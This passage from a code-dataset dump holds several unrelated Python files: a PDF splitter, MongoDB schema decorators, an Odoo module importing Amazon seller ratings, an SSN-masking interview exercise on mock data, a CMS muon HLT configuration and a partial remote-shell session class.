writer.writerow(result)\n\n","sub_path":"irs_reader/metadata/qa/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"294935891","text":"#Program to pull and sort a pdf set based on an index csv file\r\n#By Patrick Young, 5-21-21\r\n\r\nimport PyPDF2, csv, pandas as pd\r\n\r\nfrom PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger\r\n\r\n#Open CSV file with pdf indexing locations, get length of csv file\r\ndef openSpreadSheet(pathSS):\r\n with open(pathSS, newline='') as csvfile:\r\n EstimateIndex = csv.reader(csvfile, delimiter=',')\r\n list_of_rows = list(EstimateIndex)\r\n df = pd.DataFrame(list_of_rows)\r\n length_df = len(df)\r\n print(df)\r\n return df, length_df\r\n\r\n#main iteration process. Look at each row one at a time\r\n#and pull name, year, and range information. Look at corresponding pages\r\n#in the PDF.\r\ndef sortProcess(n):\r\n pdf_writer = PdfFileWriter()\r\n #Unsure if the below line is necessary, but without it and\r\n #pdfFileObj.close(), ran into memory errors\r\n pdfFileObj = open(pathPDF, 'rb')\r\n pdf = PdfFileReader(pdfFileObj)\r\n \r\n name = df.loc[n][0]\r\n year = df.loc[n][1]\r\n start = int(df.loc[n][2])\r\n end = int(df.loc[n][3])\r\n for page in range(start - 1, end):\r\n pdf_writer.addPage(pdf.getPage(page))\r\n \r\n output = f'{year}_{name}.pdf'\r\n with open(output, 'wb') as output_pdf:\r\n pdf_writer.write(output_pdf)\r\n pdfFileObj.close()\r\n \r\n\r\n#Lines to activate code\r\nif __name__=='__main__':\r\n pathSS = 'CostEstimatesIndex.csv'\r\n pathPDF = 'KPFF SPD Tacoma Cost Estimate Info.pdf'\r\n n = 1\r\n df, length_df = openSpreadSheet(pathSS)\r\n \r\n while n < length_df:\r\n sortProcess(n)\r\n n += 1\r\n","sub_path":"PDFRead.py","file_name":"PDFRead.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"457329640","text":"# coding=utf-8\n\"\"\"\nmongodb utils\n :copyright: (c) 2015 by fangpeng.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n__date__ = '1/23/16'\nimport time\nimport motor\n\n# import Tenglish.config as CONFIG\nfrom Tenglish import config as CONFIG\nfrom Tenglish.error import WrongFieldType\n\n# Connection mongodb and select tenglish database.\nMONGO_CLIENT = motor.MotorClient(CONFIG.MONGODB)\nmongodb = MONGO_CLIENT.tenglish\n\n# lambda expression for userful small tools\ncurrent_time = lambda : int(round(time.time() * 1000)) # millisecond\ncopy = lambda x: x.copy() if isinstance(x, dict) else x # copy mutable variables like dict,list.\n\n\ndef mongo_obj(schema):\n \"\"\"check mongodb data schema for function\n Use:\n schema = {\n 'name': (str, True),\n 'id': (int, True)\n }\n\n @mongo_obj(schema)\n def get_obj(data):\n return data\n\n get_obj({ \"name\": 'good'})\n \"\"\"\n def decorator(func):\n def check_value_type(obj, *args, **kwargs):\n for key in schema:\n if key in obj:\n if not isinstance(obj[key], schema[key][0]):\n if schema[key][0] is not str and \\\n not isinstance(obj[key], (str, unicode)):\n # raise value type error for mongodb\n raise WrongFieldType(key, obj[key], schema[key][0])\n elif schema[key][1]:\n obj[key] = schema[key][0]() # init value, like: int()=0, dict()={}\n\n return func(obj, *args, **kwargs)\n return check_value_type\n return decorator\n\n\ndef mongo(func):\n \"\"\"copy mutable variables.\"\"\"\n def decorator(*args, **kwargs):\n copy_args = []\n for obj in args:\n copy_args.append(copy(obj))\n\n return func(*args, **kwargs)\n return decorator\n\n\ndef cls_mongo_obj(schema):\n \"\"\"check mongodb data schema for class method.\n Use:\n schema = {\n 'name': (str, True),\n 'id': (int, True)\n }\n\n @cls_mongo_obj(schema)\n def get_obj(self, data):\n return data\n \"\"\"\n def decorator(func):\n def check_value_type(self, obj, *args, **kwargs):\n for key in schema:\n if key in obj:\n if not isinstance(obj[key], schema[key][0]):\n if schema[key][0] is not str and \\\n not isinstance(obj[key], (str, unicode)):\n # raise value type error for mongodb\n raise WrongFieldType(key, obj[key], schema[key][0])\n elif schema[key][1]:\n obj[key] = schema[key][0]() # init value, like: int()=0, dict()={}\n\n return func(self, obj, *args, **kwargs)\n return check_value_type\n return decorator\n\n\ndef cls_mongo(func):\n \"\"\"\n copy mutable data for class method\n \"\"\"\n def decorator(self, *args, **kwargs):\n copy_args = []\n for obj in args:\n copy_args.append(copy(obj))\n\n return func(self, *args, **kwargs)\n return decorator\n","sub_path":"Tenglish/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118397081","text":"# Автор: А.Н. Носкин\r\n\r\n\"\"\" идея А.М. Кабанов\"\"\"\r\nwith open(\"k7a-1.txt\") as F:\r\n s = F.readline() # считали строку\r\n\r\nk = 0 # начальная длина цепочки из \"A,B,С\"\r\nMax = 0 # макс длина цепочки из \"A,B,С\"\r\nfor c in s:\r\n if c in 'ABC':\r\n k += 1\r\n if k > Max:\r\n Max = k # перезаписали Макс длину\r\n else:\r\n k = 0 # другая буква - сбрасываем счетчик\r\nprint(Max)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"tasks_24/solutions/24-21.py","file_name":"24-21.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"256607910","text":"# -*- coding: utf-8 -*-\n# See LICENSE file for full copyright and licensing details.\n\n\nimport time\nimport base64\nimport csv\nfrom io import StringIO\nfrom datetime import datetime, timedelta\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\nfrom odoo.addons.iap.tools import iap_tools\nfrom ..endpoint import DEFAULT_ENDPOINT\n\n\nclass RatingReportHistory(models.Model):\n _name = \"rating.report.history\"\n _description = \"Rating Report History\"\n _inherit = ['mail.thread']\n _order = 'id desc'\n\n @api.depends('seller_id')\n def _compute_company(self):\n for record in self:\n company_id = record.seller_id.company_id.id if record.seller_id else False\n if not company_id:\n company_id = self.env.company.id\n record.company_id = company_id\n\n def _compute_rating_count(self):\n rating_obj = self.env['rating.rating']\n self.rating_count = rating_obj.search_count([('amz_rating_report_id', '=', self.id)])\n\n def _compute_log_count(self):\n \"\"\"\n Find all log associated with this report\n :return:\n \"\"\"\n log_obj = self.env['common.log.book.ept']\n model_id = self.env['ir.model']._get('rating.report.history').id\n self.log_count = log_obj.search_count(\n [('res_id', '=', self.id), ('model_id', '=', model_id)])\n\n name = fields.Char(size=256)\n state = fields.Selection(\n [('draft', 'Draft'), ('_SUBMITTED_', 'SUBMITTED'), ('_IN_PROGRESS_', 'IN_PROGRESS'),\n ('_CANCELLED_', 'CANCELLED'), ('_DONE_', 'Report Received'),\n ('_DONE_NO_DATA_', 'DONE_NO_DATA'), ('processed', 'PROCESSED'),\n ],\n string='Report Status', default='draft')\n seller_id = fields.Many2one('amazon.seller.ept', string='Seller', copy=False,\n help=\"Select Seller id from you wanted to get Rating Report.\")\n attachment_id = fields.Many2one('ir.attachment', string=\"Attachment\")\n instance_id = fields.Many2one(\"amazon.instance.ept\", string=\"Instance\")\n report_id = fields.Char('Report ID', readonly='1')\n report_type = fields.Char(size=256, help=\"Amazon Report Type\")\n report_request_id = fields.Char('Report Request ID', readonly='1')\n start_date = fields.Datetime(help=\"Report Start Date\")\n end_date = fields.Datetime(help=\"Report End Date\")\n requested_date = fields.Datetime(default=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n help=\"Report Requested Date\")\n user_id = fields.Many2one('res.users', string=\"Requested User\",\n help=\"Track which odoo user has requested report\")\n company_id = fields.Many2one('res.company', string=\"Company\", copy=False,\n compute=\"_compute_company\", store=True)\n rating_count = fields.Integer(compute=\"_compute_rating_count\", store=False)\n log_count = fields.Integer(compute=\"_compute_log_count\", store=False)\n amz_rating_report_ids = fields.One2many('rating.rating', 'amz_rating_report_id',\n string=\"Ratings\")\n\n @api.onchange('seller_id')\n def on_change_seller_id(self):\n \"\"\"\n This Method relocates check seller and write start date and end date.\n :return: This Method return updated value.\n \"\"\"\n if self.seller_id:\n self.start_date = datetime.now() - timedelta(self.seller_id.rating_report_days)\n self.end_date = datetime.now()\n\n def unlink(self):\n \"\"\"\n This Method if report is processed then raise UserError.\n \"\"\"\n for report in self:\n if report.state == 'processed':\n raise UserError(_('You cannot delete processed report.'))\n return super(RatingReportHistory, self).unlink()\n\n @api.model\n def default_get(self, fields):\n res = super(RatingReportHistory, self).default_get(fields)\n if not fields:\n return res\n res.update({'report_type': '_GET_SELLER_FEEDBACK_DATA_'})\n return res\n\n @api.model\n def create(self, vals):\n try:\n sequence_id = self.env.ref('amazon_ept.seq_rating_report_job').ids\n if sequence_id:\n report_name = self.env['ir.sequence'].get_id(sequence_id[0])\n else:\n report_name = '/'\n except:\n report_name = '/'\n vals.update({'name': report_name})\n return super(RatingReportHistory, self).create(vals)\n\n #\n def list_of_process_logs(self):\n \"\"\"\n List All Mismatch Details for Rating Report.\n @author: Tushar Lathiya\n :return:\n \"\"\"\n model_id = self.env['ir.model']._get('rating.report.history').id\n action = {\n 'domain': \"[('res_id', '=', \" + str(self.id) + \"), ('model_id','=',\" + str(\n model_id) + \")]\",\n 'name': 'Rating Report Logs',\n 'view_mode': 'tree,form',\n 'res_model': 'common.log.book.ept',\n 'type': 'ir.actions.act_window',\n }\n return action\n\n @api.model\n def auto_import_rating_report(self, args={}):\n \"\"\"\n This Method relocate import rating using crone.\n :param args: This Argument relocate seller id when the crone run in this argument given amazon seller id\n :return: This Method Return Boolean(True).\n \"\"\"\n seller_id = args.get('seller_id', False)\n if seller_id:\n seller = self.env['amazon.seller.ept'].browse(seller_id)\n if seller.rating_report_last_sync_on:\n start_date = seller.rating_report_last_sync_on\n start_date = datetime.strftime(start_date, '%Y-%m-%d %H:%M:%S')\n start_date = datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S')\n start_date = start_date + timedelta(days=seller.rating_report_days * -1 or -3)\n\n else:\n start_date = datetime.now() - timedelta(days=30)\n start_date = start_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n date_end = datetime.now()\n date_end = date_end.strftime(\"%Y-%m-%d %H:%M:%S\")\n report_type = '_GET_SELLER_FEEDBACK_DATA_'\n rating_report = self.create({'report_type': report_type,\n 'seller_id': seller_id,\n 'start_date': start_date,\n 'end_date': date_end,\n 'state': 'draft',\n 'requested_date': time.strftime(\"%Y-%m-%d %H:%M:%S\")\n })\n rating_report.with_context(is_auto_process=True).request_report()\n seller.write({'rating_report_last_sync_on': date_end})\n return True\n\n @api.model\n def auto_process_rating_report(self, args={}):\n \"\"\"\n This Method Relocate auto process rating rating using crone.\n :param args: This Argument relocate seller id when the crone run in this argument given amazon seller id\n :return: This Method Return Boolean(True).\n \"\"\"\n seller_id = args.get('seller_id', False)\n if seller_id:\n seller = self.env['amazon.seller.ept'].browse(seller_id)\n rating_report = self.search([('seller_id', '=', seller.id),\n ('state', 'in', ['_SUBMITTED_', '_IN_PROGRESS_', '_DONE_'])\n ])\n\n for report in rating_report:\n if report.state != '_DONE_':\n report.with_context(is_auto_process=True).get_report_request_list()\n if report.report_id and report.state == '_DONE_':\n report.with_context(is_auto_process=True).get_report()\n if report.attachment_id:\n report.with_context(is_auto_process=True).process_rating_report()\n self._cr.commit()\n return True\n\n def list_of_rating(self):\n \"\"\"\n This Method relocate list of amazon rating.\n :return:\n \"\"\"\n rating_obj = self.env['rating.rating']\n records = rating_obj.search([('amz_rating_report_id', '=', self.id)])\n action = {\n 'domain': \"[('id', 'in', \" + str(records.ids) + \" )]\",\n 'name': 'Amazon Rating',\n 'view_mode': 'tree,form',\n 'res_model': 'rating.rating',\n 'type': 'ir.actions.act_window',\n }\n return action\n\n def request_report(self):\n \"\"\"\n Request _GET_SELLER_FEEDBACK_DATA_ Report from Amazon for specific date range.\n :return: Boolean\n \"\"\"\n common_log_book_obj = self.env['common.log.book.ept']\n shipping_report_obj = self.env['shipping.report.request.history']\n\n if not self.seller_id:\n raise UserError(_('Please select Seller'))\n\n start_date, end_date = self.report_start_and_end_date()\n\n kwargs = shipping_report_obj.prepare_amazon_request_report_kwargs(self.seller_id)\n kwargs.update({\n 'emipro_api': 'request_report_v13',\n 'report_type': self.report_type,\n 'start_date': start_date,\n 'end_date': end_date,\n })\n response = iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/iap_request', params=kwargs,\n timeout=1000)\n if response.get('reason'):\n if self._context.get('is_auto_process'):\n common_log_book_obj.create({\n 'type': 'import',\n 'module': 'amazon_ept',\n 'active': True,\n 'log_lines': [\n (0, 0, {'message': 'Rating Report Process' + response.get('reason')})]\n })\n else:\n raise UserError(_(response.get('reason')))\n else:\n result = response.get('result')\n self.update_report_history(result)\n return True\n\n def report_start_and_end_date(self):\n \"\"\"\n Prepare Start and End Date for request reports\n :return: start_date, end_date\n \"\"\"\n start_date, end_date = self.start_date, self.end_date\n if start_date:\n db_import_time = time.strptime(str(start_date), \"%Y-%m-%d %H:%M:%S\")\n db_import_time = time.strftime(\"%Y-%m-%dT%H:%M:%S\", db_import_time)\n start_date = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.gmtime(\n time.mktime(time.strptime(db_import_time, \"%Y-%m-%dT%H:%M:%S\"))))\n start_date = str(start_date) + 'Z'\n else:\n today = datetime.now()\n earlier = today - timedelta(days=30)\n earlier_str = earlier.strftime(\"%Y-%m-%dT%H:%M:%S\")\n start_date = earlier_str + 'Z'\n\n if end_date:\n db_import_time = time.strptime(str(end_date), \"%Y-%m-%d %H:%M:%S\")\n db_import_time = time.strftime(\"%Y-%m-%dT%H:%M:%S\", db_import_time)\n end_date = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.gmtime(\n time.mktime(time.strptime(db_import_time, \"%Y-%m-%dT%H:%M:%S\"))))\n end_date = str(end_date) + 'Z'\n else:\n today = datetime.now()\n earlier_str = today.strftime(\"%Y-%m-%dT%H:%M:%S\")\n end_date = earlier_str + 'Z'\n\n return start_date, end_date\n\n def get_report_request_list(self):\n \"\"\"\n This Method relocates get report list from amazon.\n :return: This Method return boolean(True/False).\n \"\"\"\n self.ensure_one()\n common_log_book_obj = self.env['common.log.book.ept']\n shipping_report_obj = self.env['shipping.report.request.history']\n list_of_wrapper = []\n if not self.seller_id:\n raise UserError(_('Please select Seller'))\n if not self.report_request_id:\n return True\n kwargs = shipping_report_obj.prepare_amazon_request_report_kwargs(self.seller_id)\n kwargs.update( \\\n {'emipro_api': 'get_report_request_list_v13', 'request_ids': (self.report_request_id,)})\n response = iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/iap_request', params=kwargs)\n if response.get('reason'):\n if self._context.get('is_auto_process'):\n common_log_book_obj.create({\n 'type': 'import',\n 'module': 'amazon_ept',\n 'active': True,\n 'log_lines': [\n (0, 0, {'message': 'Rating Report Process ' + response.get('reason')})]\n })\n else:\n raise UserError(_(response.get('reason')))\n else:\n list_of_wrapper = response.get('result')\n\n for result in list_of_wrapper:\n self.update_report_history(result)\n return True\n\n def update_report_history(self, request_result):\n \"\"\"\n Update Report History in odoo\n :param request_result:\n :return:\n \"\"\"\n report_info = request_result.get('ReportInfo', {})\n report_request_info = request_result.get('ReportRequestInfo', {})\n request_id = report_state = report_id = False\n if report_request_info:\n request_id = str(report_request_info.get('ReportRequestId', {}).get('value', ''))\n report_state = report_request_info.get('ReportProcessingStatus', {}).get('value',\n '_SUBMITTED_')\n report_id = report_request_info.get('GeneratedReportId', {}).get('value', False)\n elif report_info:\n report_id = report_info.get('ReportId', {}).get('value', False)\n request_id = report_info.get('ReportRequestId', {}).get('value', False)\n\n if report_state == '_DONE_' and not report_id:\n self.get_report_list()\n vals = {}\n if not self.report_request_id and request_id:\n vals.update({'report_request_id': request_id})\n if report_state:\n vals.update({'state': report_state})\n if report_id:\n vals.update({'report_id': report_id})\n self.write(vals)\n return True\n\n def get_report(self):\n \"\"\"\n This Method relocates get rating report as an attachment in rating reports form view.\n :return: This Method return boolean(True/False).\n \"\"\"\n self.ensure_one()\n common_log_book_obj = self.env['common.log.book.ept']\n shipping_report_obj = self.env['shipping.report.request.history']\n\n result = {}\n seller = self.seller_id\n if not seller:\n raise UserError(_('Please select seller'))\n\n if not self.report_id:\n return True\n\n kwargs = shipping_report_obj.prepare_amazon_request_report_kwargs(self.seller_id)\n kwargs.update({'emipro_api': 'get_report_v13', 'report_id': self.report_id, })\n response = iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/iap_request', params=kwargs,\n timeout=1000)\n if response.get('reason'):\n if self._context.get('is_auto_process'):\n common_log_book_obj.create({\n 'type': 'import',\n 'module': 'amazon_ept',\n 'active': True,\n 'log_lines': [\n (0, 0, {'message': 'Rating Report Process ' + response.get('reason')})]\n })\n else:\n raise UserError(_(response.get('reason')))\n else:\n result = response.get('result')\n\n if result:\n result = result.encode()\n result = base64.b64encode(result)\n file_name = \"Rating_report_\" + time.strftime(\"%Y_%m_%d_%H%M%S\") + '.csv'\n\n attachment = self.env['ir.attachment'].create({\n 'name': file_name,\n 'datas': result,\n 'res_model': 'mail.compose.message',\n 'type': 'binary'\n })\n self.message_post(body=_(\"Rating Report Downloaded\"),\n attachment_ids=attachment.ids)\n self.write({'attachment_id': attachment.id})\n seller.write({'rating_report_last_sync_on': datetime.now()})\n return True\n\n def download_report(self):\n \"\"\"\n This Method relocates download amazon rating report.\n :return:This Method return boolean(True/False).\n \"\"\"\n self.ensure_one()\n if self.attachment_id:\n return {\n 'type': 'ir.actions.act_url',\n 'url': '/web/content/%s?download=true' % (self.attachment_id.id),\n 'target': 'self',\n }\n return True\n\n def process_rating_report(self):\n \"\"\"\n This Method process rating report.\n :return:This Method return boolean(True/False).\n \"\"\"\n self.ensure_one()\n ir_cron_obj = self.env['ir.cron']\n if not self._context.get('is_auto_process', False):\n ir_cron_obj.with_context({'raise_warning': True}).find_running_schedulers(\n 'ir_cron_process_rating_request_report_seller_', self.seller_id.id)\n amazon_process_job_log_obj = self.env['common.log.book.ept']\n sale_order_obj = self.env['sale.order']\n rating_obj = self.env['rating.rating']\n ir_model = self.env['ir.model']\n if not self.attachment_id:\n raise UserError(_(\"There is no any report are attached with this record.\"))\n if not self.seller_id:\n raise UserError(_(\"Seller is not defind for processing report\"))\n imp_file = StringIO(base64.b64decode(self.attachment_id.datas).decode())\n reader = csv.DictReader(imp_file, delimiter='\\t')\n model_id = self.env['ir.model']._get('rating.report.history').id\n ir_model = ir_model.search([('model', '=', 'sale.order')])\n job = amazon_process_job_log_obj.search(\n [('model_id', '=', model_id),\n ('res_id', '=', self.id)])\n if not job:\n job = amazon_process_job_log_obj.create({\n 'module': 'amazon_ept',\n 'type': 'import',\n 'model_id': model_id,\n 'res_id': self.id,\n 'active': True,\n 'log_lines': [(0, 0, {'message': 'Import Rating Report Process'})]\n })\n for row in reader:\n amz_order_id = row.get('Order ID')\n amz_rating_value = row.get('Rating')\n amz_rating_comment = row.get('Comments')\n amz_your_response = row.get('Your Response')\n amz_rating_date = row.get('Date')\n amz_rating_date = datetime.strptime(amz_rating_date, '%d/%m/%y')\n amazon_sale_order = sale_order_obj.search(\n [('amz_order_reference', '=', amz_order_id),\n ('amz_instance_id', 'in', self.seller_id.instance_ids.ids)])\n if not amazon_sale_order:\n job.write({'log_lines': [\n (0, 0, {'message': 'This Order %s does not exist in odoo' % (amz_order_id),\n 'order_ref': amz_order_id})]})\n continue\n amazon_order_rating = rating_obj.search(\n [('res_model', '=', 'sale.order'), ('res_id', '=', amazon_sale_order.id)])\n if not amazon_order_rating:\n rating_obj.create({\n 'rating': float(amz_rating_value) if amz_rating_value is not None else False,\n 'feedback': amz_rating_comment,\n 'res_model_id': ir_model.id,\n 'res_id': amazon_sale_order.id,\n 'consumed': True,\n 'partner_id': amazon_sale_order.partner_id.id,\n 'amz_instance_id': amazon_sale_order.amz_instance_id.id,\n 'amz_fulfillment_by': amazon_sale_order.amz_fulfillment_by,\n 'amz_rating_report_id': self.id,\n 'publisher_comment': amz_your_response,\n 'amz_rating_submitted_date': amz_rating_date\n })\n else:\n job.write({'log_lines': [ \\\n (0, 0,\n {'message': 'For This Order %s rating already exist in odoo' % amz_order_id,\n 'order_ref': amz_order_id})]})\n continue\n self.write({'state': 'processed'})\n return True\n","sub_path":"amazon_ept/models/rating_report.py","file_name":"rating_report.py","file_ext":"py","file_size_in_byte":20555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"108796619","text":"\"\"\"\n We are implementing a `view` that must consume\n some external service (which we've mocked below). The service returns\n data that needs to be sanitized for client consumption -- in the\n below example it includes sensitive information like SSN. The\n exercises work through simple sanitizations, to slightly more complex\n ones, before asking that the interviewee try to define a general approach\n to solving the problem.\n\"\"\"\ndef external_service(project_name):\n # Mock; in real life we use some information\n # about the project to, say, read from a\n # particular URL.\n return {\n 'project': 'Sanitization Project',\n 'users': [\n {\n 'username': 'z',\n 'email': 'z@fareharbor.com',\n 'ssn': '111223333',\n 'api_keys': [\n {\n 'codename': 'tugboat',\n 'code': 'la8dfh47',\n },\n {\n 'codename': 'titanic',\n 'code': 'dg810fj3',\n },\n ]\n },\n {\n 'username': 'bk',\n 'email': 'bryan@fareharbor.com',\n 'ssn': '888990000',\n 'api_keys': [],\n }\n ],\n }\n\n\nsensitive_information = ['ssn', 'code']\n\ndef mask_ssn(dictionary):\n dictionary['ssn'] = '*****%s' % dictionary['ssn'][5:]\n\ndef remove_from_dictionary(key):\n def _remove(dictionary):\n dictionary.pop(key, None)\n return _remove\n \nkey_callback = {\n 'ssn': mask_ssn,\n 'code': remove_from_dictionary('code')\n}\n\ndef sanitize(response):\n if isinstance(response, dict):\n for key in sensitive_information:\n if key in response:\n value = response.get(key)\n callback = key_callback.get(key)\n if callback:\n callback(response)\n for key, value in response.items():\n sanitize(value)\n if isinstance(response, list):\n for i in response:\n sanitize(i)\n return response\n\n\ndef view(project_name):\n response = external_service(project_name)\n result = sanitize(response)\n return result\n\n\nresponse = view('part 1')\n\n# Part 2:\n#\n# Now, we still want to strip the codes, but let's replace the SSN with\n# *****3333 (where 3333 is really the last 4).\n\nassert response['users'][0]['ssn'] == '*****3333', 'last 4'\nassert 'code' not in response['users'][0]['api_keys'][0], 'stripped first code'\nassert 'code' not in response['users'][0]['api_keys'][1], 'stripped second code'\nassert response['users'][1]['ssn'] == '*****0000', 'last 4'\n","sub_path":"fareharbor.py","file_name":"fareharbor.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"342918996","text":"import FWCore.ParameterSet.Config as cms\n\n#migration to tfile service at some point\nTFileService = cms.Service(\"TFileService\", fileName = cms.string('HLTbit.root') )\n\n#associators\nimport SimTracker.TrackAssociation.TrackAssociatorByPosition_cfi\n# associator\nAssociatorByDeltaR0pt1 = SimTracker.TrackAssociation.TrackAssociatorByPosition_cfi.TrackAssociatorByPosition.clone(\n method = cms.string('posdr'),\n QCut = cms.double(0.1),\n ComponentName = cms.string('AssociatorByDeltaR0.1')\n )\n\nAssociatorByDeltaR0pt2 = SimTracker.TrackAssociation.TrackAssociatorByPosition_cfi.TrackAssociatorByPosition.clone(\n method = cms.string('posdr'),\n QCut = cms.double(0.2),\n ComponentName = cms.string('AssociatorByDeltaR0.2')\n )\n\nAssociatorByDeltaR1 = SimTracker.TrackAssociation.TrackAssociatorByPosition_cfi.TrackAssociatorByPosition.clone(\n method = cms.string('posdr'),\n QCut = cms.double(1.0),\n ComponentName = cms.string('AssociatorByDeltaR1.0')\n )\n\n\n\nfrom Workspace.MuonHLTTreeUtility.muonHLTTreeUtility_cfi import *\n\n#redo tracking particles\nimport SimGeneral.TrackingAnalysis.trackingParticles_cfi\nmytrackingParticles = SimGeneral.TrackingAnalysis.trackingParticles_cfi.mergedtruth.clone()\nmytrackingParticles.vertexDistanceCut = 1000\n\n#muon tracking particles\nimport Validation.RecoTrack.cutsTPEffic_cfi\ntpMuon = Validation.RecoTrack.cutsTPEffic_cfi.cutsTPEffic.clone()\n#only muons\ntpMuon.pdgId = cms.vint32(13,-13)\n#allows decays in flight\ntpMuon.tip = cms.double(10000.0)\ntpMuon.lip = cms.double(10000.0)\ntpMuon.src = cms.InputTag('mytrackingParticles')\n\n\n#define the basic sequence of modules for muon HLT reconstruction\ndef muonHLTrecoSequence(process):\n #from HLTrigger.Configuration.HLT_2E30_cff import HLTBeginSequence,HLTL2muonrecoSequence,HLTL2muonisorecoSequence,HLTL3muonrecoSequence,HLTL3muonisorecoSequence\n muonHLTreco = cms.Sequence(process.HLTBeginSequence+process.HLTL2muonrecoSequence+process.HLTL2muonisorecoSequence+process.HLTL3muonrecoSequence+process.HLTL3muonisorecoSequence)\n return (muonHLTreco)\n\n#redo the tracking particle\nfrom Configuration.StandardSequences.MixingNoPileUp_cff import *\ntpProduction = cms.Sequence ( mix * mytrackingParticles * tpMuon )\n#redigi needed for association by hits only\ntkSimDigiLinkAreThere = cms.EDFilter(\"IsProductAvailable\",\n className = cms.string(''),\n src = cms.InputTag('')\n )\nfrom SimTracker.Configuration.SimTracker_cff import *\nfrom IOMC.RandomEngine.IOMC_cff import *\nRandomNumberGeneratorService = cms.Service(\"RandomNumberGeneratorService\",\n restoreStateLabel = cms.untracked.string('randomEngineStateProducer'),\n simSiPixelDigis = cms.PSet(\n initialSeed = cms.untracked.uint32(1234567),\n engineName = cms.untracked.string('HepJamesRandom')\n ),\n simSiStripDigis = cms.PSet(\n initialSeed = cms.untracked.uint32(1234567),\n engineName = cms.untracked.string('HepJamesRandom')\n )\n )\n\n#from Validation.RecoMuon.associators_cff import tpToL3MuonAssociation,tpToL2MuonAssociation\n\n#reDIGI_Path = cms.Paht( !tkSimDigiLinkAreThere + trdigi )\n\n\nMHTU_Path = cms.Path( tpProduction ) \n\n#has to be in the endapth so that it can get the TriggerResults object\nTimerService = cms.Service(\"TimerService\",useCPUtime = cms.untracked.bool(True))\nimport HLTrigger.Timer.timer_cfi\nhltTimer = HLTrigger.Timer.timer_cfi.myTimer.clone()\nMHTU_EndPath = cms.EndPath( hltTimer * hltMuonTreeMaker )\n\n#MHTUSchedule = cms.Schedule( reDIGI_Path + MHTU_Path )\nMHTUSchedule = cms.Schedule( MHTU_Path )\n#remember to extend with the EndPath\n\ndef insertMHTU(process):\n process.load('Workspace.MuonHLTTreeUtility.muonHLTTreeUtility_cff')\n process.muonHLTreco = muonHLTrecoSequence(process)\n process.MHTU_Path+=process.muonHLTreco\n import FWCore.ParameterSet.SequenceTypes\n for p in process.schedule:\n if (p.__class__==FWCore.ParameterSet.SequenceTypes.EndPath):\n process.schedule.insert(process.schedule.index(p), process.MHTU_Path )\n break\n process.schedule.append( process.MHTU_EndPath )\n\n ##actually do the --no_output option\n if (hasattr(process,\"out_step\")):\n process.schedule.remove(process.out_step)\n","sub_path":"cmssw/WorkSpace/MuonHLTTreeUtility/python/muonHLTTreeUtility_cff.py","file_name":"muonHLTTreeUtility_cff.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222282976","text":"#\n# Copyright (c) 2014, Adam Meily\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice, this\n# list of conditions and the following disclaimer in the documentation and/or\n# other materials provided with the distribution.\n#\n# * Neither the name of the {organization} nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nfrom io import StringIO\nimport json\nfrom pypsi.remote import protocol as proto\nimport select\nimport errno\n\n\nclass RemoteKeyboardInterrupt(KeyboardInterrupt):\n pass\n\n\nclass ConnectionClosed(EOFError):\n pass\n\n\nclass RemotePypsiSession(object):\n\n def __init__(self, socket=None):\n self.socket = socket\n self.queue = []\n self.buffer = StringIO()\n self.registry = {\n proto.InputRequest.status: proto.InputRequest,\n proto.InputResponse.status: proto.InputResponse,\n proto.CompletionRequest.status: proto.CompletionRequest,\n proto.CompletionResponse.status: proto.CompletionResponse,\n proto.InputRequest.status: proto.InputRequest,\n proto.ShellOutputResponse.status: proto.ShellOutputResponse\n }\n self.running = True\n\n def on_send(self, obj):\n return obj\n\n def 